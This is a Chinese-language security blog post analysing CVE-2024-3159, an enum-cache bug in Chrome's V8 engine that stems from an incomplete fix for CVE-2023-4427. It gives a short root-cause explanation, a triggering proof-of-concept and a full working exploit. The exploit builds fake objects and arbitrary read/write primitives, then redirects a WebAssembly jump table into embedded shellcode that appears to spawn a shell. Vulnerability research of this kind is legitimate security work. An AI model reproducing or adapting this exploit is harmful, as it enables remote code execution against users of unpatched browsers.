CVE-2024-3159:Out of bounds memory access in V8

已于 2024-04-22 20:45:18 修改
阅读量312 收藏 10
点赞数 4
分类专栏: # Chrome 文章标签: enum_cache bug
于 2024-04-22 20:44:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/138090377
版权

前言

这个洞在今年的 Pwn2Own 上被利用,目前还没有公开报告。该漏洞可以说是 CVE-2023-4427 漏洞未正确修复,其原理和利用跟 CVE-2023-4427 没有本质区别,CVE-2023-4427 之前分析过,所以这里不作过多说明,仅仅做记录

环境搭建

git checkout 1c623f9ff6e077be1c66f155485ea4005ddb6574
gclient sync -D

漏洞分析

在这里插入图片描述
可以看到这里对之前修复的 CVE-2023-4427 增加了一种情况:

  • {split_map}'s descriptors 存在 enum_cache 时,也要进行复制更新

则之前的修复遗漏了这种情况,这里也不多说了,参考 CVE-2023-4427 就行,毕竟这个漏洞就是 CVE-2023-4427 修复不完全导致的,这里直接看 POC

const obj1 = {};
obj1.a = 1;

const obj2 = {};
obj2.a = 1;
obj2.b = 2;

const obj3 = {};
obj3.a = 1;
obj3.b = 2;
obj3.c = 3;
obj3.d = 4;

const obj4 = {};
obj4.a = 1;
obj4.b = 2;
obj4.c = 3;
obj4.e = 4;

// init enum cache
for (let key in obj2) {}

function trigger(callback) {
        for (let key in obj2) {
                callback();
                console.log(obj2[key]);
        }
}

%PrepareFunctionForOptimization(trigger);
trigger(_=>_);
trigger(_=>_);
%OptimizeFunctionOnNextCall(trigger);
trigger(_=>_);

trigger(
        _=>{
                obj4.c = 1.1;
                for (let i in obj1) {}
        }
);

输出如下:

$ ./d8 --allow-natives-syntax poc.js
1
2
1
2
1
2
1
undefined

大致原理如下:
在这里插入图片描述
这里可以出现一种情况,即 descriptor array0enum cache 不为空,而 descriptor array1enum cache 为空,那么当修改 obj4.c = 1.1 时,由于这里是从 Smi 变成了一个 double,所以并不是简单修改描述符数组,而是会为 obj4 创建一个新的 map,并沿着 map transition tree 进行修改,使其 descriptor array 保持一致。而此时 obj4 对应的描述符数组的 enum cache 为空,所以不会对新的描述符数组的 enum cache 进行更新,从而导致 obj2 对应的 enum cache 也为空。后面的情况跟 CVE-2023-4427 就是如出一辙了…

漏洞利用

针对此类漏洞,本来是可以泄漏 TheHole 的,但是高版本利用不了,所以这里还是只能写一个依赖特定版本的利用(使用硬编码…

简单糊了一个…

var buf = new ArrayBuffer(8);
var dv  = new DataView(buf);
var u8  = new Uint8Array(buf);
var u32 = new Uint32Array(buf);
var u64 = new BigUint64Array(buf);
var f32 = new Float32Array(buf);
var f64 = new Float64Array(buf);
var roots = new Array(0x30000);
var index = 0;

function pair_u32_to_f64(l, h) {
        u32[0] = l;
        u32[1] = h;
        return f64[0];
}

function u64_to_f64(val) {
        u64[0] = val;
        return f64[0];
}


function f64_to_u64(val) {
        f64[0] = val;
        return u64[0];
}

function set_u64(val) {
        u64[0] = val;
}

function set_l(l) {
        u32[0] = l;
}

function set_h(h) {
        u32[1] = h;
}

function get_l() {
        return u32[0];
}

function get_h() {
        return u32[1];
}

function get_u64() {
        return u64[0];
}

function get_f64() {
        return f64[0];
}

function get_fl(val) {
        f64[0] = val;
        return u32[0];
}

function get_fh(val) {
        f64[0] = val;
        return u32[1];
}

function add_ref(obj) {
        roots[index++] = obj;
}

function major_gc() {
        new ArrayBuffer(0x7fe00000);
}

function minor_gc() {
        for (let i = 0; i < 8; i++) {
                add_ref(new ArrayBuffer(0x200000));
        }
        add_ref(new ArrayBuffer(8));
}

function hexx(str, val) {
        console.log(str+": 0x"+val.toString(16));
}

function sleep(ms) {
        return new Promise((resolve) => setTimeout(resolve, ms));
}

var spray_array = Array(0xf700);
var data_start_addr = 0x00442129+7;
var map_addr = data_start_addr + 0x1000;
var fake_object_addr = map_addr + 0x1000;

spray_array[(map_addr-data_start_addr) / 8] = u64_to_f64(0x2d04040400000061n);
//spray_array[(map_addr-data_start_addr) / 8] = pair_u32_to_f64(data_start_addr+0x200, 0x2d040404);
spray_array[(map_addr-data_start_addr) / 8 + 1] = u64_to_f64(0x0a0007ff11000842n);
spray_array[(fake_object_addr-data_start_addr) / 8] = pair_u32_to_f64(map_addr+1, 0x219);
spray_array[(fake_object_addr-data_start_addr) / 8 + 1] = pair_u32_to_f64(data_start_addr-1, 0x20);

var leak_object_array = new Array(0xf700).fill({});
var leak_object_element_addr = 0x004c2129;

//%DebugPrint(spray_array);
//%DebugPrint(leak_object_array);
//readline();

const object1 = {};
object1.a = 1;

const object2 = {};
object2.a = 2;
object2.b = 2;

//const N = pair_u32_to_f64(0x42424242, 0x42424242);
const N = pair_u32_to_f64(fake_object_addr+1, fake_object_addr+1);
var fake_object_array = [
        N,N,N,N,N,N,N,N,N,N,N,N,N,N,
        N,N,N,N,N,N,N,N,N,N,N,N,N,N,
        N,N,N,N,N,N,N,N,N,N,N,N,N,N,
        N,N,N,N,N,N,N,N,N,N,N,N,N,N,
        N,N,N,N,N,N,N,N,N,N,N,N,N,N,
        N,N,N,N,N,N,N,N,N,N,N,N,N,N,
        N,N,N,N,N,N,N,N,N,N,N,N,N,N,
];

const object3 = {};
object3.a = 3;
object3.b = 3;
object3.c = 3;
object3.d = 3;

const object4 = {};
object4.a = 4;
object4.b = 4;
object4.c = 4;
object4.e = 4;

let fake_array;
for (let key in object2) {}
function trigger(callback) {
        for (let key in object2) {
                callback();
                fake_array = object2[key];
        }
}

//%PrepareFunctionForOptimization(trigger);
trigger(_ => _);
trigger(_ => _);
//%OptimizeFunctionOnNextCall(trigger);
trigger(_ => _);
for (let i = 0; i < 0x10000; i++) {
        trigger(_ => _);
        trigger(_ => _);
        trigger(_ => _);
}
//%DebugPrint(object4);
//readline();
trigger(_ => {
//      print("callback");
        object4.c = 1.1;
        for (let key in object1) { }
//      %DebugPrint(object2);
//      readline();
});

//print(fake_array === %TheHole());
//%DebugPrint(fake_array);

function addressOf(obj) {
        spray_array[(fake_object_addr-data_start_addr) / 8 + 1] = pair_u32_to_f64(leak_object_element_addr, 0x20);
        leak_object_array[0] = obj;
        f64[0] = fake_array[0];
        return u32[0];
}

//var test = [1.1];
//hexx("test address", addressOf(test));
//%DebugPrint(test);


function arb_read_cage(addr) {
        spray_array[(fake_object_addr-data_start_addr) / 8 + 1] = pair_u32_to_f64(addr-8, 0x20);
        return f64_to_u64(fake_array[0]);
}

function arb_write_half_cage(addr, val) {
        let orig_val = arb_read_cage(addr);
        fake_array[0] = pair_u32_to_f64(orig_val&0xffffffff, val);
}

function arb_write_full_cage(addr, val) {
        spray_array[(fake_object_addr-data_start_addr) / 8 + 1] = pair_u32_to_f64(addr-8, 0x20);
        fake_array[0] = u64_to_f64(val);
}

var code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 8, 2, 96, 0, 1, 124, 96, 0, 0, 3, 3, 2, 0, 1, 7, 14, 2, 4, 109, 97, 105, 110, 0, 0, 3, 112, 119, 110, 0, 1, 10, 76, 2, 71, 0, 68, 104, 110, 47, 115, 104, 88, 235, 7, 68, 104, 47, 98, 105, 0, 91, 235, 7, 68, 72, 193, 224, 24, 144, 144, 235, 7, 68, 72, 1, 216, 72, 49, 219, 235, 7, 68, 80, 72, 137, 231, 49, 210, 235, 7, 68, 49, 246, 106, 59, 88, 144, 235, 7, 68, 15, 5, 144, 144, 144, 144, 235, 7, 26, 26, 26, 26, 26, 26, 11, 2, 0, 11]);
var module = new WebAssembly.Module(code);
var instance = new WebAssembly.Instance(module, {});
var wmain = instance.exports.main;
for (let j = 0x0; j < 10000; j++) {
        wmain();
}

let instance_addr = addressOf(instance);
hexx("instance_addr", instance_addr);
let jump_table_addr = instance_addr + 0x50;
let rwx_addr = arb_read_cage(jump_table_addr);
hexx("rwx_addr", rwx_addr);

arb_write_full_cage(jump_table_addr, rwx_addr+0x71dn-5n);
var pwn = instance.exports.pwn;
pwn();

//%DebugPrint(instance);
//readline();

效果如下:
在这里插入图片描述

参考

https://chromium-review.googlesource.com/c/v8/v8/+/5401860/2/src/objects/map-updater.cc#1055
https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop.html

XiaozaYa
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
CVE-2023-4427:Out-of-bounds access in ReduceJSLoadPropertyWithEnumeratedKey
qq_61670993的博客
03-30 929
enum_cache bug
Attacking JavaScript Engines: A case study of JavaScriptCore and CVE-2016-4622(转)
weixin_30340353的博客
06-09 1736
转:http://phrack.org/papers/attacking_javascript_engines.html Title: Attacking JavaScript Engines: A case study of JavaScriptCore and CVE-2016-4622 Author: saelo Date: October 27, 2016 ...
Chrome v8 pwn
sky123博客
04-17 2304
它是⼀个多进程+IPC的程序, 不同的进程管理不同的内容,
20220513-rk3568编译linux4.19的buildroot-1(uboot)
南岭笑笑生之家
05-13 2275
20220513-rk3568编译linux4.19的buildroot 2022/5/13 15:20 [BEGIN] 2022/5/10 16:07:49 rootroot@rootroot-System-Product1:~$ rootroot@rootroot-System-Product1:~$ rootroot@rootroot-System-Product1:~$ rootroot@rootroot-System-Product1:~$ ll total 244 drwxr-x...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
CVE-2012-1675 补丁 oracle 11.2.0.1
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的...
简历模板-前端开发简历模板
最新发布
05-24
简历模板
计算机专业毕业设计范例424篇jsp17529零食小吃食品购物销售网站 ssh mysql 录像.rar
05-24
博主给大家详细整理了计算机毕业设计最新项目,对项目有任何疑问(部署跟文档),都可以问博主哦~ 一、JavaWeb管理系统毕设项目【计算机毕设选题】计算机毕业设计选题,500个热门选题推荐,更多作品展示 计算机毕业设计|PHP毕业设计|JSP毕业程序设计|Android毕业设计|Python设计论文|微信小程序设计
Vue3项目练习静态资源assets
05-24
Vue3项目练习静态资源assets
Python_MLX框架中的示例.zip
05-24
Python_MLX框架中的示例
Python_MagicTime延时视频生成模型作为变形模拟器.zip
05-24
Python_MagicTime延时视频生成模型作为变形模拟器
设计1.ms14 (Security copy).ms14 (security copy)
05-24
设计1.ms14 (Security copy).ms14 (security copy)
HCIP-Security V4.0 培训教材PPT全套合集
05-24
HCIP-Security V4.0 培训教材PPT全套合集 01 网络安全认证概述.pptx 02 防火墙高可靠性技术.pptx 03 防火墙流量管理.pptx 04 防火墙虚拟系统.pptx 05 防火墙智能选路.pptx 06 IPSec VPN技术应用.pptx 07 SSL VPN技术与应用.pptx 08 网络攻击与防范.pptx 09 漏洞防御与渗透测试.pptx 10 内容安全过滤技术.pptx 11 应急响应.pptx 12 网络接入控制.pptx 13 企业网络安全综合案例.pptx HCIP-Security V4.0 培训教材.pdf HCIP-Security V4.0 实验手册.pdf
cve-2024-0195
01-19
cve-2024-0195是一个已被公开的漏洞编号,通常用于标识特定的计算机安全漏洞。这个漏洞编号通常由安全研究人员或组织在发现并报告一个新漏洞时,给漏洞分配一个唯一的标识符。 在这种情况下,cve-2024-0195表示在2024年发现的第195个已知漏洞。漏洞编号的目的是帮助用户和组织识别并补救安全漏洞,以保护其系统和数据免受潜在的攻击和损害。 对于普通用户来说,了解漏洞编号有助于他们更好地了解他们的系统或软件是否受到当前已知的漏洞威胁。对于技术人员和安全专家来说,漏洞编号可以帮助他们更有效地管理和防范潜在的安全风险。 总之,cve-2024-0195代表着一个已知的计算机安全漏洞,可能需要通过软件更新、修复补丁或其他安全措施来加以解决。因此,对于系统管理员和用户来说,了解并及时处理漏洞编号所代表的漏洞是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值